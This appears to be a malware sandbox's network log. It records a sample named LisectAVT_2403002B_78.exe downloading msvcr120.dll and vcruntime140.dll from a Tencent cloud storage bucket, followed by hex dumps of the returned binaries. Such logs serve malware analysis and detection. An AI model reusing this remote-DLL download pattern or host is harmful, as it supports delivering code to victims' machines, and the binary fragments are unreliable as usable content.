2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 00 00 00 00 00 00 00 00 01 00 00 00 94 6f 00 10 d0 50 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 69 00 10 b8 4d 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 6c 00 10 00 00 00 00 e0 00 00 00 00 00 00 00 78 4c 06 10 dc 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 51 06 10 9c 6e 00 10 70 71 00 10 d8 64 00 10 a0 75 00 10 00 00 00 00 78 5a 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6c 00 10 58 49 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 70 00 10 00 00 00 00 01 00 00 00 04 00 00 00 ac 71 00 10 30 48 06 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 6a 00 10 88 41 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 40 68 00 Data Ascii: oP@iM@ lxLjQnpqduxZ@lXI@pq0H@jA@@h
2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 00 ff 15 0c 92 06 10 83 c4 14 89 5d f0 85 f6 74 06 8d 9f f0 00 00 00 8d 55 f0 8b cb e8 c5 46 00 00 8b c7 e8 fc 28 03 00 c2 04 00 6a 04 b8 7d be 03 10 e8 1f 29 03 00 8b f1 89 75 f0 c7 06 9c 3f 00 10 83 65 fc 00 8b c6 99 52 50 6a 03 ff 15 0c 92 06 10 83 4d fc ff 8d 4e 08 83 c4 0c e8 5a 09 00 00 e8 bd 28 03 00 c3 8d 41 08 c3 51 6a 00 83 c1 08 83 ca ff e8 f4 40 00 00 59 59 c3 55 8b ec 83 e4 f8 51 53 56 8b f1 83 ca ff 57 33 ff 57 8d 5e 08 8b cb e8 d5 40 00 00 59 85 c0 74 04 32 c0 eb 71 33 c0 8d 8e 60 01 00 00 33 d2 40 f0 0f b1 11 85 c0 74 e9 8b c6 99 52 50 6a 04 ff 15 0c 92 06 10 83 c4 0c c7 44 24 0c 01 00 00 00 85 db 74 06 8d be f0 00 00 00 8d 54 24 0c 8b cf e8 04 46 00 00 8b 8e 6c 01 00 00 56 68 40 91 00 10 85 c9 74 06 8b 01 ff 10 eb 19 8b 8e 68 01 00 00 85 Data Ascii: ]tUF(j})u?eRPjMNZ(AQj@YYUQSVW3W^@Yt2q3`3@tRPjD$tT$FlVh@th
2024-07-25 09:25:40 UTC	16368	IN	Data Raw: a8 e8 73 0b 00 00 8b c6 e8 33 09 03 00 c2 04 00 6a 04 b8 f4 c3 03 10 e8 42 09 03 00 8b f1 89 75 f0 c7 06 dc 42 00 10 c7 45 fc 01 00 00 00 8d 4e 60 8b 01 c6 46 58 01 ff 50 08 8b 06 8b ce ff 50 18 8d 8e f8 00 00 00 e8 cd f8 ff ff 83 4d fc ff 8b ce e8 9b 00 00 00 e8 d0 08 03 00 c3 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0a 8d 4f 60 8b 01 52 ff 10 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0b 8d 4f 60 8b 01 52 ff 50 04 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 89 08 01 00 00 85 c9 74 1b 8b 11 56 8b 75 08 8d 46 08 50 ff 52 08 8b 06 8b ce 6a 01 ff 50 04 5e 5d c2 04 00 e8 84 8e 00 00 cc 6a 04 b8 2d c4 03 10 e8 60 08 03 00 8b Data Ascii: s3jBuBEN`FXPPMUEVW3MWpRtO`Rj^_^]UEVW3MWpRtO`RPj^_^]UtVuFPRjP^]j-`
2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 4b f0 01 00 59 6a 0b 59 8b f0 8d 7b 08 f3 a5 8d 4d 90 e8 da f5 ff ff 8b c3 e8 1e c9 02 00 c2 04 00 55 8b ec 8b 45 0c 83 ec 2c 53 8b d9 56 57 89 43 04 8d 45 d4 50 c7 03 44 15 00 10 e8 0e f0 01 00 59 6a 0b 59 8d 7b 08 8b f0 f3 a5 5f 5e 8b c3 5b 8b e5 5d c2 08 00 6a 38 b8 03 cc 03 10 e8 0b c9 02 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 44 39 37 75 40 6a 34 ff 15 30 93 06 10 59 89 45 08 89 75 fc 85 c0 74 1e 8b 4d 0c e8 e7 f9 ff ff 50 8d 4d bc e8 3e f4 ff ff 8b 4d 08 43 56 50 e8 7d ff ff ff 8b f0 89 37 f6 c3 01 74 08 8d 4d bc e8 3c f5 ff ff 6a 02 58 e8 7f c8 02 00 c3 6a 00 e8 08 ff ff ff c3 55 8b ec 8b 45 08 89 41 04 8b c1 c7 01 70 15 00 10 5d c2 04 00 83 61 04 00 c7 01 70 15 00 10 c3 55 8b ec 8b 45 0c 8b 49 0c 0f b6 d0 66 8b 45 08 6a 00 66 85 04 51 58 0f 95 Data Ascii: KYjY{MUE,SVWCEPDYjY{_^[]j8}3]tD97u@j40YEutMPM>MCVP}7tM<jXjUEAp]apUEIfEjfQX
2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83 7e 14 10 72 Data Ascii: L18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.~r
2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 75 05 33 c0 40 5d c3 6a 02 58 5d c3 a9 ff 7f ff ff 75 0a 66 83 39 00 75 04 33 c0 5d c3 33 c0 66 85 d2 0f 95 c0 83 e8 02 5d c3 55 8b ec 8b 45 08 83 c0 02 5d c3 55 8b ec 51 56 8b 75 08 d9 06 dc 1d 50 12 00 10 df e0 d9 ee f6 c4 05 0f 8b 0c 01 00 00 d9 45 0c dd e1 df e0 f6 c4 44 0f 8b fa 00 00 00 d9 06 dc 1d 40 12 00 10 df e0 f6 c4 41 75 12 dd d9 33 c0 dd d8 40 d9 05 00 31 06 10 e9 dd 00 00 00 d9 06 dc 0d 20 12 00 10 d9 5d 08 d9 45 08 d8 d2 df e0 dd da f6 c4 05 7a 08 d9 05 48 12 00 10 eb 06 d9 05 18 12 00 10 d9 5d 08 d9 45 08 de c2 d9 c9 e8 33 84 02 00 0f b7 c8 0f bf c1 89 45 08 db 45 08 d9 5d 08 d9 06 d9 45 08 dd 05 a0 11 00 10 d8 c9 de ea dc 0d 10 12 00 10 de e9 d9 5d 08 d9 05 30 31 06 10 d9 c0 d9 e0 d9 45 08 d8 d1 df e0 dd d9 f6 c4 41 75 0f d8 d1 df e0 dd Data Ascii: u3@]jX]uf9u3]3f]UE]UQVuPED@Au3@1 ]EzH]E3EE]E]01EAu
2024-07-25 09:25:40 UTC	8184	IN	Data Raw: 47 3b f8 7f 0b 7c 04 3b f3 73 05 8b de 89 7d 10 85 db 74 12 53 ff 75 08 ff 75 f0 e8 f4 68 02 00 8b 4d fc 83 c4 0c 01 5d 08 03 cb 8b 55 f8 13 55 10 2b f3 89 55 f8 8b 55 f4 1b 7d 10 8b 42 30 29 18 8b 42 20 01 18 eb 28 8b 4d f4 8b 5d 08 8b 11 0f b6 03 50 ff 52 0c 83 f8 ff 74 2c 8b 4d fc 43 83 c1 01 89 5d 08 83 55 f8 00 83 c6 ff 83 d7 ff 8b 5d f4 89 4d fc 85 ff 0f 8f 5c ff ff ff 7c 08 85 f6 0f 85 52 ff ff ff 8b 4d fc 8b 55 f8 5e 5f 8b c1 5b 8b e5 5d c2 0c 00 6a 08 b8 1a d2 03 10 e8 e1 68 02 00 8b f1 89 75 ec 33 d2 89 55 f0 39 55 10 74 17 c7 06 ec 1c 00 10 c7 46 18 24 1c 00 10 89 55 fc c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 e8 1c 00 10 8b 06 8b 48 04 8d 41 e8 89 44 31 fc 8b 06 89 56 08 89 56 0c 8b 48 04 03 ce e8 bd f6 ff ff 8b c6 e8 52 Data Ascii: G;\|;s}tSuuhM]UU+UU}B0)B (M]PRt,MC]U]M\\|RMU^_[]jhu3U9UtF$UEuu@HAD1VVHR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49714	43.152.64.193	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:42 UTC	135	OUT	GET /msvcr120.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:42 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 970912 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:42 GMT ETag: "034ccadc1c073e4216e9466b720f9849" Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 3551019292791871068 x-cos-request-id: NjZhMjFhMTZfOTllZjc4MGJfMjQ1YTNfNjBmNmNk x-cos-server-side-encryption: AES256
2024-07-25 09:25:42 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 39 02 12 17 58 6c 41 17 58 6c 41 17 58 6c 41 ca a7 a7 41 14 58 6c 41 17 58 6d 41 a7 58 6c 41 51 09 8c 41 b9 5a 6c 41 51 09 b3 41 76 58 6c 41 51 09 89 41 21 58 6c 41 51 09 8d 41 af 58 6c 41 51 09 b0 41 16 58 6c 41 51 09 b7 41 16 58 6c 41 51 09 b2 41 16 58 6c 41 52 69 63 68 17 58 6c 41 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 7c 4f 52 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S9XlAXlAXlAAXlAXmAXlAQAZlAQAvXlAQA!XlAQAXlAQAXlAQAXlAQAXlARichXlAPEL\|OR"
2024-07-25 09:25:42 UTC	16384	IN	Data Raw: af 53 03 00 65 57 03 00 27 1f 0c 00 1f 76 0a 00 c4 b7 0a 00 46 e3 07 00 65 e3 07 00 d7 b3 07 00 84 3d 0a 00 49 15 03 00 12 03 0a 00 0f 2f 08 00 b1 2f 08 00 05 c1 02 00 27 e2 07 00 85 57 03 00 d2 7b 01 00 9c 33 08 00 5c ce 02 00 bf 3d 0a 00 63 89 08 00 46 e2 07 00 e4 34 08 00 ad 35 08 00 69 36 08 00 90 35 08 00 e5 38 08 00 04 39 08 00 86 36 08 00 a7 36 08 00 c9 36 08 00 ea 36 08 00 2b 44 03 00 7a 37 08 00 bd 25 03 00 7a 3a 08 00 97 37 08 00 b8 37 08 00 da 37 08 00 fb 37 08 00 e4 1a 0a 00 4a 1c 0a 00 6c 02 08 00 b0 02 08 00 00 03 08 00 42 03 08 00 92 03 08 00 d9 03 08 00 38 06 08 00 50 06 08 00 81 76 0a 00 d4 78 0a 00 24 39 08 00 3e 39 08 00 5a 39 08 00 77 39 08 00 94 39 08 00 b3 39 08 00 d1 e4 07 00 a3 e5 07 00 17 e5 07 00 5d e5 07 00 37 b8 0a 00 d1 b8 0a Data Ascii: SeW'vFe=I//'W{3\=cF45i65896666+Dz7%z:7777JlB8Pvx$9>9Z9w999]7
2024-07-25 09:25:42 UTC	8168	IN	Data Raw: 6c 6c 65 63 74 69 6f 6e 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 51 41 45 40 58 5a 00 3f 3f 30 5f 54 69 6d 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 40 49 5f 4e 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 41 41 45 40 50 42 51 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 74 61 72 67 65 74 40 43 6f Data Ascii: llection@details@Concurrency@@QAE@XZ??0_Timer@details@Concurrency@@IAE@I_N@Z??0__non_rtti_object@std@@QAE@ABV01@@Z??0__non_rtti_object@std@@QAE@PBD@Z??0bad_cast@std@@AAE@PBQBD@Z??0bad_cast@std@@QAE@ABV01@@Z??0bad_cast@std@@QAE@PBD@Z??0bad_target@Co
2024-07-25 09:25:42 UTC	16384	IN	Data Raw: 53 70 69 6e 57 61 69 74 40 24 30 41 40 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 58 58 5a 00 3f 5f 47 65 74 40 5f 43 75 72 72 65 6e 74 53 63 68 65 64 75 6c 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 53 41 3f 41 56 5f 53 63 68 65 64 75 6c 65 72 40 32 33 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 52 54 54 72 61 63 65 49 6e 66 6f 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 50 42 55 5f 43 4f 4e 43 52 54 5f 54 52 41 43 45 5f 49 4e 46 4f 40 64 65 74 61 69 6c 73 40 31 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 75 72 72 65 6e 63 79 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 49 58 5a 00 3f 5f 47 65 74 43 75 72 72 65 6e 74 49 6e 6c 69 6e 65 44 65 70 74 68 40 5f 53 74 61 63 6b 47 Data Ascii: SpinWait@$0A@@details@Concurrency@@IAEXXZ?_Get@_CurrentScheduler@details@Concurrency@@SA?AV_Scheduler@23@XZ?_GetConcRTTraceInfo@Concurrency@@YAPBU_CONCRT_TRACE_INFO@details@1@XZ?_GetConcurrency@details@Concurrency@@YAIXZ?_GetCurrentInlineDepth@_StackG
2024-07-25 09:25:42 UTC	8168	IN	Data Raw: 5f 73 65 74 5f 6f 75 74 70 75 74 5f 66 6f 72 6d 61 74 00 5f 73 65 74 5f 70 72 69 6e 74 66 5f 63 6f 75 6e 74 5f 6f 75 74 70 75 74 00 5f 73 65 74 5f 70 75 72 65 63 61 6c 6c 5f 68 61 6e 64 6c 65 72 00 5f 73 65 74 65 72 72 6f 72 6d 6f 64 65 00 5f 73 65 74 6a 6d 70 00 5f 73 65 74 6a 6d 70 33 00 5f 73 65 74 6d 61 78 73 74 64 69 6f 00 5f 73 65 74 6d 62 63 70 00 5f 73 65 74 6d 6f 64 65 00 5f 73 65 74 73 79 73 74 69 6d 65 00 5f 73 6c 65 65 70 00 5f 73 6e 70 72 69 6e 74 66 00 5f 73 6e 70 72 69 6e 74 66 5f 63 00 5f 73 6e 70 72 69 6e 74 66 5f 63 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 73 00 5f 73 6e 70 72 69 6e 74 66 5f 73 5f 6c 00 5f 73 6e 73 63 61 6e 66 00 5f 73 6e 73 63 61 6e 66 5f 6c 00 5f 73 6e 73 63 61 6e 66 5f 73 00 5f 73 6e Data Ascii: _set_output_format_set_printf_count_output_set_purecall_handler_seterrormode_setjmp_setjmp3_setmaxstdio_setmbcp_setmode_setsystime_sleep_snprintf_snprintf_c_snprintf_c_l_snprintf_l_snprintf_s_snprintf_s_l_snscanf_snscanf_l_snscanf_s_sn
2024-07-25 09:25:42 UTC	8184	IN	Data Raw: 46 69 6c 65 20 74 6f 6f 20 6c 61 72 67 65 00 90 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 90 90 90 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 90 90 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 90 42 72 6f 6b 65 6e 20 70 69 70 65 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 90 90 90 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 90 90 90 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 90 90 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 90 90 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 90 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 90 90 90 44 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 65 Data Ascii: File too largeNo space left on deviceInvalid seekRead-only file systemToo many linksBroken pipeDomain errorResult too largeResource deadlock avoidedFilename too longNo locks availableFunction not implementedDirectory not e
2024-07-25 09:25:42 UTC	8184	IN	Data Raw: 4e 00 4f 00 00 00 90 90 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 90 90 73 00 6d 00 61 00 2d 00 53 00 45 00 00 00 90 90 61 00 72 00 2d 00 4f 00 4d 00 00 00 65 00 6e 00 2d 00 4a 00 4d 00 00 00 65 00 73 00 2d 00 56 00 45 00 00 00 73 00 6d 00 73 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 59 00 45 00 00 00 65 00 6e 00 2d 00 43 00 42 00 00 00 65 00 73 00 2d 00 43 00 4f 00 00 00 73 00 6d 00 6e 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 53 00 59 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 65 00 73 00 2d 00 41 Data Ascii: NOar-TNen-ZAes-DOsr-BA-Cyrlsma-SEar-OMen-JMes-VEsms-FIar-YEen-CBes-COsmn-FIar-SYen-BZes-PEar-JOen-TTes-A
2024-07-25 09:25:42 UTC	16384	IN	Data Raw: 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 55 8b ec 8b 55 14 8b 4d 08 56 85 d2 0f 84 5f e5 00 00 85 c9 0f 84 64 e5 00 00 8b 45 0c 85 c0 0f 84 59 e5 00 00 85 d2 0f 84 5b e5 00 00 8b 75 10 85 f6 0f 84 a2 38 04 00 53 8b d9 57 8b f8 83 fa ff 75 1e 2b de 8a 06 88 04 33 46 84 c0 74 03 4f 75 f3 85 ff 5f 5b 0f 84 d5 bf 01 00 33 c0 5e 5d c3 2b f1 8a 04 1e 88 03 43 84 c0 74 06 4f 74 03 4a 75 f0 85 d2 75 db 88 13 eb d7 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 55 8b ec 83 ec 18 8b 45 08 8b 55 0c 53 8b 5d 14 56 57 c6 45 ff 00 8b 7b 08 8d 73 10 33 38 c7 45 f4 01 00 00 00 8b 07 83 f8 fe 0f 85 a5 d1 04 00 8b 47 08 8b 4f 0c 03 ce 33 0c 30 ff d2 8b 45 10 f6 40 04 66 0f 85 24 d5 00 Data Ascii: L$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f$
2024-07-25 09:25:42 UTC	8168	IN	Data Raw: 85 d4 fd ff ff 2d eb 10 c6 85 d4 fd ff ff 2b eb 07 c6 85 d4 fd ff ff 20 c7 85 cc fd ff ff 01 00 00 00 e9 3b 01 00 00 f6 c3 04 0f 85 95 01 00 00 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 57 6a 30 e8 92 ca ff ff 83 c4 10 e9 78 01 00 00 85 c0 0f 8e 83 01 00 00 8b ce 48 89 85 c4 fd ff ff 0f b7 01 83 c1 02 50 6a 06 8d 45 f4 89 8d 84 fd ff ff 50 8d 85 a0 fd ff ff 50 e8 c5 9b 00 00 83 c4 10 85 c0 75 43 39 85 a0 fd ff ff 74 3b ff b5 a8 fd ff ff 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 8d 45 f4 ff b5 a0 fd ff ff 50 e8 72 ca ff ff 8b 85 c4 fd ff ff 83 c4 14 8b 8d 84 fd ff ff 85 c0 0f 84 30 01 00 00 eb 90 83 c9 ff 89 8d e0 fd ff ff e9 26 01 00 00 8d 85 e0 fd ff ff 50 ff b5 d0 fd ff ff 57 6a 20 e8 ed c9 ff ff 83 c4 10 e9 4a a1 00 00 50 e8 f4 81 ff ff 33 c0 59 89 85 b0 fd Data Ascii: -+ ;PWj0xHPjEPPuC9t;PEPr0&PWj JP3Y
2024-07-25 09:25:42 UTC	8184	IN	Data Raw: c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 40 85 ff ff 0f b6 4e f2 0f b6 42 f2 2b c8 0f 84 37 fc ff ff 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff e9 24 fc ff ff 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 07 85 ff ff eb 93 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 ef 84 ff ff eb 26 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 d7 84 ff ff e9 66 fe ff ff 0f b6 f8 0f b6 42 ed 2b f8 75 c2 0f b6 7e ee 0f b6 42 ee 2b f8 0f 85 d4 e7 ff ff 0f b6 7e ef 0f b6 42 ef 2b f8 74 16 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff 85 c9 0f 85 95 84 ff ff 0f b6 4e f0 0f b6 42 f0 2b c8 0f 84 78 fa ff ff 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff e9 65 fa ff ff 0f b6 f8 0f b6 42 08 2b f8 75 55 0f b6 7e 09 0f b6 42 09 2b f8 0f 85 a8 06 00 00 0f Data Ascii: M@NB+73E$3M3M&3MfB+u~B+~B+t3MNB+x3EeB+uU~B+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49715	43.152.64.193	443	4800	C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 09:25:44 UTC	139	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com Cache-Control: no-cache
2024-07-25 09:25:45 UTC	472	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 91104 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 25 Jul 2024 09:25:45 GMT ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b" Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 15584681233261869999 x-cos-request-id: NjZhMjFhMTlfYmRlZjc4MGJfZDUyOV82MGRjZWY= x-cos-server-side-encryption: AES256
2024-07-25 09:25:45 UTC	7732	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 8f b4 8a e1 ee da d9 e1 ee da d9 e1 ee da d9 32 9c db d8 e3 ee da d9 e8 96 49 d9 ea ee da d9 e1 ee db d9 c8 ee da d9 e7 6f d9 d8 f2 ee da d9 e7 6f de d8 f7 ee da d9 e7 6f df d8 fd ee da d9 e7 6f da d8 e0 ee da d9 e7 6f 25 d9 e0 ee da d9 e7 6f d8 d8 e0 ee da d9 52 69 63 68 e1 ee da d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 73 87 13 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2Iooooo%oRichPELs"
2024-07-25 09:25:45 UTC	16384	IN	Data Raw: c8 28 00 00 1c 00 00 00 2e 72 64 61 74 61 24 73 78 64 61 74 61 00 00 00 e4 28 00 00 b0 00 00 00 2e 72 64 61 74 61 24 76 6f 6c 74 6d 64 00 00 00 94 29 00 00 3c 02 00 00 2e 72 64 61 74 61 24 7a 7a 7a 64 62 67 00 00 00 d0 2b 00 00 13 ce 00 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 e3 f9 00 00 4d 00 00 00 2e 74 65 78 74 24 78 00 30 fa 00 00 10 03 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 40 fd 00 00 14 09 00 00 2e 65 64 61 74 61 00 00 00 10 01 00 94 00 00 00 2e 64 61 74 61 00 00 00 94 10 01 00 b8 00 00 00 2e 64 61 74 61 24 72 00 4c 11 01 00 b4 00 00 00 2e 64 61 74 61 24 72 73 00 00 00 00 00 12 01 00 64 04 00 00 2e 62 73 73 00 00 00 00 00 20 01 00 bc 00 00 00 2e 69 64 61 74 61 24 35 00 00 00 00 bc 20 01 00 08 00 00 00 2e 30 30 63 66 67 00 00 c4 20 01 00 78 00 00 Data Ascii: (.rdata$sxdata(.rdata$voltmd)<.rdata$zzzdbg+.text$mnM.text$x0.xdata$x@.edata.data.data$rL.data$rsd.bss .idata$5 .00cfg x
2024-07-25 09:25:45 UTC	16384	IN	Data Raw: 57 e8 c2 07 00 00 83 c4 10 50 e8 79 05 00 00 cc 55 8b ec 83 ec 38 53 8b 5d 08 81 3b 03 00 00 80 0f 84 17 01 00 00 56 57 e8 17 16 00 00 33 ff 39 78 08 74 46 57 ff 15 48 20 01 10 8b f0 e8 02 16 00 00 39 70 08 74 33 81 3b 4d 4f 43 e0 74 2b 81 3b 52 43 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 53 e8 19 84 00 00 83 c4 1c 85 c0 0f 85 c1 00 00 00 8b 45 18 89 45 ec 89 7d f0 39 78 0c 0f 86 b4 00 00 00 ff 75 20 50 ff 75 14 8d 45 ec ff 75 1c 50 8d 45 dc 50 e8 18 83 00 00 8b 55 e0 83 c4 18 8b 45 dc 89 45 f4 89 55 fc 3b 55 e8 0f 83 80 00 00 00 6b ca 14 89 4d f8 8b 00 8d 7d c8 6a 05 8b 70 10 8b 45 1c 03 f1 59 f3 a5 39 45 c8 7f 4e 3b 45 cc 7f 49 8b 4d d4 8b 45 d8 c1 e1 04 83 c0 f0 03 c1 8b 48 04 85 c9 74 06 80 79 08 00 75 2e f6 00 40 75 29 6a 00 Data Ascii: WPyU8S];VW39xtFWH 9pt3;MOCt+;RCCt#u$u 